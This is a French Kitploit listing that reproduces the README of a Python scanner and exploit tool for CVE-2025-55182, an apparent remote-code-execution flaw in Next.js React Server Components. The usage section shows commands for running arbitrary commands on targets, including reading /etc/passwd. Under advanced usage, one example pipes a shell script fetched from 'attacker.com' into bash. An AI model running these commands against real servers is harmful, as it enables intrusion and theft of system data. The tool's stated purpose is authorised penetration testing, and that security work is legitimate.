Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-55182 — Un scanner de sécurité basé sur Python pour détecter et exploiter les vulnérabilités des **React Server Components (RSC)** dans les applications Next.js. Cet outil effectue une détection passive, un fingerprinting actif et des tests d'exploitation RCE. | Kitploit
Outils/GitHubGitHub/mahaveer-choudhary/cve-2025-55182
Scanners de VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubmahaveer-choudhary/cve-2025-55182

CVE-2025-55182

Un scanner de sécurité basé sur Python pour détecter et exploiter les vulnérabilités des **React Server Components (RSC)** dans les applications Next.js. Cet outil effectue une détection passive, un fingerprinting actif et des tests d'exploitation RCE.

Voir le dépôt
11il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

RSC Detector - Scanner de vulnérabilités React Server Components

Un scanner de sécurité basé sur Python pour détecter et exploiter les vulnérabilités des React Server Components (RSC) dans les applications Next.js. Cet outil effectue une détection passive, un fingerprinting actif et des tests d’exploitation RCE.

⚠️ AVERTISSEMENT : Cet outil est réservé aux tests de sécurité autorisés uniquement. L’accès non autorisé aux systèmes informatiques est illégal. Obtenez toujours une autorisation écrite avant de tester.


Fonctionnalités

✅ Détection passive - Analyse le HTML, les en-têtes et la structure de la page pour les indicateurs RSC
✅ Fingerprinting actif - Envoie des en-têtes spécifiques RSC pour détecter les réponses du serveur
✅ Analyse des en-têtes HTTP - Identifie les en-têtes liés à Next.js et RSC
✅ Exploitation RCE - Exécute des commandes sur les serveurs vulnérables (si exploitable)
✅ Sortie terminal colorée - Retour visuel amélioré pour une meilleure lisibilité
✅ Mode interactif - Exécute plusieurs commandes en mode exploitation
✅ Décodage robuste - Gère les charges utiles compressées gzip et binaires


Installation

Prérequis

  • Python 3.8+
  • pip (gestionnaire de paquets Python)

Configuration

  1. Cloner le dépôt

    root@kitploit:~
    git clone https://github.com/mahaveer-choudhary/CVE-2025-55182.git
    cd CVE-2025-55182
    
  2. Installer les dépendances

    root@kitploit:~
    pip install -r requirements.txt
    

    Paquets requis :

    • requests>=2.28.0 - Bibliothèque cliente HTTP
    • urllib3>=1.26.0 - Utilitaires HTTP avancés
    • colorama>=0.4.6 - Couleurs du terminal (compatible Windows)
    • beautifulsoup4 - Analyse HTML

Utilisation

Détection de base (sans exploitation)

root@kitploit:~
python rsc_detector.py https://example.com

Scan complet avec exploitation

root@kitploit:~
python rsc_detector.py https://example.com --exploit

Exécuter une commande spécifique

root@kitploit:~
python rsc_detector.py https://example.com --exploit --cmd "whoami"

Mode exploitation interactif

root@kitploit:~
python rsc_detector.py https://example.com --exploit

Saisissez ensuite les commandes à l’invite (tapez quit pour quitter).


Options de la ligne de commande

OptionDescription
<URL>URL cible (obligatoire). Préfixe automatiquement https:// si absent
--exploitActive l’exploitation RCE après la détection
--cmd <commande>Exécute une commande spécifique (à utiliser avec --exploit)

Exemples

Détecter une vulnérabilité RSC :

root@kitploit:~
python rsc_detector.py https://target.com

Exploiter et exécuter la commande id :

root@kitploit:~
python rsc_detector.py https://target.com --exploit --cmd "id"

Exploiter et exécuter cat /etc/passwd :

root@kitploit:~
python rsc_detector.py https://target.com --exploit --cmd "cat /etc/passwd"

Mode interactif (plusieurs commandes) :

root@kitploit:~
python rsc_detector.py https://target.com --exploit

Comment ça marche

1. Scan passif

  • Vérifie la présence du marqueur window.__next_f (App Router Next.js)
  • Détecte le Content-Type text/x-component
  • Recherche les marqueurs du React Flight Protocol
  • Analyse __NEXT_DATA__ et les imports de Next.js

2. Analyse des en-têtes

  • Examine les en-têtes Server, Vary et X-Nextjs-Cache
  • Identifie la prise en charge RSC dans les en-têtes HTTP

3. Fingerprinting actif

  • Envoie des requêtes avec l’en-tête RSC: 1
  • Analyse la réponse du serveur aux en-têtes spécifiques RSC
  • Détecte la structure du React Flight Protocol

4. Exploitation RCE

  • Construit une charge utile JSON malveillante exploitant la sérialisation des React Server Components
  • Envoie des données multipart/form-data pour déclencher l’exécution de code côté serveur
  • Décode la sortie de commande encodée en base64
  • Prend en charge les réponses compressées gzip

Sortie et résultats

Résultats de détection

root@kitploit:~
[*] Starting RSC Detection Scan on: https://example.com
====================================================================

[1] Running Passive Scan...
    Status: DETECTED
    Score: 80/100
    - Found: window.__next_f (App Router)

[2] Analyzing Headers...
    - Vary header includes RSC: ...

[3] Running Active Fingerprint...
    Status: DETECTED
    - Response Content-Type became text/x-component
    - Vary header contains 'RSC'

====================================================================

[FINAL RESULT] VULNERABLE
[!] This application appears to be vulnerable to RSC-based attacks!
    Consider: RCE exploitation may be possible

Sortie d’exploitation

root@kitploit:~
[*] Executing command: whoami
[+] Command executed successfully!
[OUTPUT]
root

Détails de la vulnérabilité

CVE-2025-55182 exploite :

  • Défauts de sérialisation des React Server Components (RSC)
  • Vulnérabilités de désérialisation des Server Actions Next.js
  • Pollution du prototype d’objet via des charges utiles malveillantes
  • Injection de commandes via child_process.execSync()

Surface d’attaque

  • Applications Next.js utilisant App Router
  • Composants serveur avec entrées contrôlées par l’utilisateur
  • Applications avec RSC activé mais non correctement validé

Directives légales et éthiques

⚠️ Important

Cet outil est STRICTEMENT RÉSERVÉ AUX TESTS DE SÉCURITÉ AUTORISÉS :

  1. ✅ À FAIRE : Utiliser sur les systèmes que vous possédez ou pour lesquels vous avez une autorisation écrite
  2. ✅ À FAIRE : Signaler les vulnérabilités de manière responsable au vendeur
  3. ✅ À FAIRE : Suivre les pratiques de divulgation responsable
  4. ❌ À NE PAS FAIRE : Utiliser contre des systèmes sans autorisation
  5. ❌ À NE PAS FAIRE : Utiliser à des fins malveillantes
  6. ❌ À NE PAS FAIRE : Stocker ou exécuter des données sensibles

L’accès non autorisé à un ordinateur est illégal en vertu de :

  • Computer Fraud and Abuse Act (CFAA) - États-Unis
  • Computer Misuse Act 1990 - Royaume-Uni
  • Lois similaires dans la plupart des pays

Divulgation responsable

Si vous découvrez une vulnérabilité à l’aide de cet outil :

  1. NE PAS divulguer publiquement tant que le vendeur n’a pas corrigé
  2. Contacter directement l’équipe de sécurité du vendeur
  3. Accorder 90 jours pour le développement du correctif
  4. Coordonner avec le vendeur le moment de la divulgation
  5. Créditer vous-même dans les avis après divulgation

Dépannage

Erreurs de certificat SSL

L’outil ignore la vérification SSL par défaut. Pour l’activer :

root@kitploit:~
detector = RSCDetector(url, verify_ssl=True)

Erreurs de décodage Base64

L’outil automatiquement :

  • Ajoute du remplissage aux chaînes base64 mal formées
  • Détecte et décompresse les charges utiles gzip
  • Replie les caractères de remplacement UTF-8 pour les données binaires

Absence de clé « digest » dans la réponse

  • La cible peut ne pas être vulnérable
  • Le serveur peut filtrer la charge utile d’exploitation
  • Essayez des tests manuels ou des points de terminaison différents

Problèmes de dépassement de délai

Augmentez le délai d’attente dans le code :

root@kitploit:~
response = self.session.get(self.url, timeout=30)  # 30 secondes

Structure du projet

root@kitploit:~
CVE-2025-55182/
├── README.md                # Ce fichier
├── requirements.txt         # Dépendances Python
├── rsc_detector.py         # Moteur principal de scan et d’exploitation
├── rsc_cli.py              # Utilitaires CLI (si présent)
├── script.py               # Scripts supplémentaires (si présent)
├── COLOR_GUIDE.md          # Documentation de la sortie colorée
└── .gitignore              # Règles Git ignore

Dépendances

root@kitploit:~
requests>=2.28.0         # Requêtes HTTP
urllib3>=1.26.0          # HTTP avancé
beautifulsoup4>=4.11.0   # Analyse HTML
colorama>=0.4.6          # Couleurs du terminal (Windows)

Installez tout d’un coup :

root@kitploit:~
pip install -r requirements.txt

Conseils de performance

  • Accélérer la détection : omettez le flag --exploit si vous ne faites que scanner
  • Tests par lots : créez un script pour scanner plusieurs URL
  • Délai réseau : ajustez les valeurs de délai pour les réseaux lents
  • Bypass SSL : la vérification est désactivée par défaut pour plus de flexibilité

Utilisation avancée

Exécution de commande personnalisée

root@kitploit:~
python rsc_detector.py https://target.com --exploit --cmd "curl attacker.com/shell | bash"

Redirection de sortie

root@kitploit:~
python rsc_detector.py https://target.com > scan_results.txt 2>&1

Scan par lots

root@kitploit:~
for url in https://site1.com https://site2.com; do
    python rsc_detector.py "$url"
done

Limitations

  • ⚠️ Fonctionne uniquement sur les configurations Next.js vulnérables
  • ⚠️ Nécessite que RSC soit activé sur l’application cible
  • ⚠️ Certains serveurs peuvent filtrer ou bloquer les charges utiles d’exploitation
  • ⚠️ La sortie binaire peut ne pas s’afficher correctement dans le terminal
  • ⚠️ L’exécution de commandes dépend des autorisations du serveur

Contribution

Vous avez trouvé un bug ou une amélioration ? Les contributions sont les bienvenues !

  1. Forkez le dépôt
  2. Créez une branche de fonctionnalité (git checkout -b feature/amelioration)
  3. Commitez vos modifications (git commit -am 'Ajout d’une fonctionnalité')
  4. Poussez vers la branche (git push origin feature/amelioration)
  5. Soumettez une Pull Request

Avertissement

root@kitploit:~
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND.
THE AUTHORS ASSUME NO LIABILITY FOR MISUSE OR UNAUTHORIZED ACCESS.
USE AT YOUR OWN RISK AND ONLY WITH PROPER AUTHORIZATION.

Licence

Ce projet est fourni uniquement à des fins éducatives et de tests de sécurité autorisés.


Références

  • Documentation React Server Components
  • Next.js App Router
  • CVE-2025-55182 (lorsqu’elle sera disponible)
  • OWASP : Failles d’injection

Contact et support

  • Signaler des vulnérabilités : utilisez la divulgation responsable
  • Problèmes de sécurité : ne les publiez pas publiquement ; contactez directement les mainteneurs
  • Demandes de fonctionnalités : ouvrez un ticket sur GitHub

Auteur

Créé pour la recherche en sécurité et les tests de pénétration autorisés.

Dernière mise à jour : 19 décembre 2025


Journal des modifications

v1.0.0

  • ✅ Détection passive RSC
  • ✅ Fingerprinting actif
  • ✅ Exploitation RCE
  • ✅ Sortie terminal colorée
  • ✅ Mode exploitation interactif
  • ✅ Support de la décompression Gzip
  • ✅ Décodage base64 robuste

Souvenez-vous : Un grand pouvoir implique de grandes responsabilités. Utilisez cet outil de manière éthique et légale.

Télécharger l’outil